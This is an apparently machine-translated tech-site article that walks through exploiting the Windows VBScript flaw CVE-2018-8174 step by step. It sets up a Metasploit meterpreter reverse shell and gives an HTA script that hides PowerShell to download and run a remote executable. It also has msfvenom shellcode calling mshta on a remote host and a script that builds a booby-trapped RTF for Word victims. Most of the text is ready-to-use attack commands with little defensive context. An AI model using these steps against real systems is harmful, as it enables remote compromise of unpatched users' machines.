Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to achieve the reproduction of 0day vulnerability CVE-2018-8174. Many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

POC verification

If the system is not patched, the calculator will pop up when the IE browser opens this address.

Http://test.lr3800.com/CVE-2018-8174_PoC.html

Metasploit recurrence

Download the metasploit module to local

Git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

Copy CVE-2018-8174.rb to the fileformat directory

Cp CVE-2018-8174.rb / usr/share/metasploit-framework/modules/exploits/windows/fileformat/

Copy CVE-2018-8174.rtf to the exploits directory

Cp CVE-2018-8174.rtf / usr/share/metasploit-framework/data/exploits/

Start metasploit

Use exploit/windows/fileformat/CVE-2018-8174set PAYLOAD windows/meterpreter/reverse_tcpset srvhost 192.168.0.116set lhost 192.168.0.116exploit

Copy the msf.rtf file in the / root/.msf4/local/ directory to the target host and open it using the word document

Or an IE browser can open http://192.168.0.116:8080 to get a session.

Reappearance of custom downloader

Use mshta to download files from a remote server for execution.

Please download the poc attachment first and use the link below: https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg password: ci8h

1. Construct the HTA file. When accessing the hta file, it will trigger powershell to download the file to the temporary directory for execution.

Prepare your xx.exe file to upload to the site directory, if you get the address http://xxx.com/xxx.exe

HTA Code:

A=new ActiveXObject ("WScript.Shell"); a.run ('% SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe-windowstyle hidden (new-object System.Net.WebClient). DownloadFile (\ 'http://xxx.com/xxx.exe\',\' c:/windows/temp/xxx.exe\'); window.close ()

Upload the file named 8174.hta to the site directory; if you get the address http://xxx.lr3800.com/8174.hta

two。 Use msfvenom to generate js Shellcode

Msfvenom-p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta'-f js_le exitfunc=thread-a x86

Replace the generated Shellcode characters with 8174poc.html 166lines of code

Upload the 8174poc.html file to the site directory if you get the address http://xxx.lr3800.com/8174poc.html

3. Generate Word documents

* download the python script and save it locally

Git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

Run CVE-2018-8174.py

Python CVE-2018-8174.py-u http://xxx.lr3800.com/8174poc.html-o exp.rtf

Get the "exp.rtf" file in the directory, use the Word document to open it and download the execution xx.exe file, or open the IE browser to open http://xxx.lr3800.com/8174poc.html to download the execution xx.exe file

After reading the above, do you have any further understanding of how to reproduce the 0day vulnerability CVE-2018-8174? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.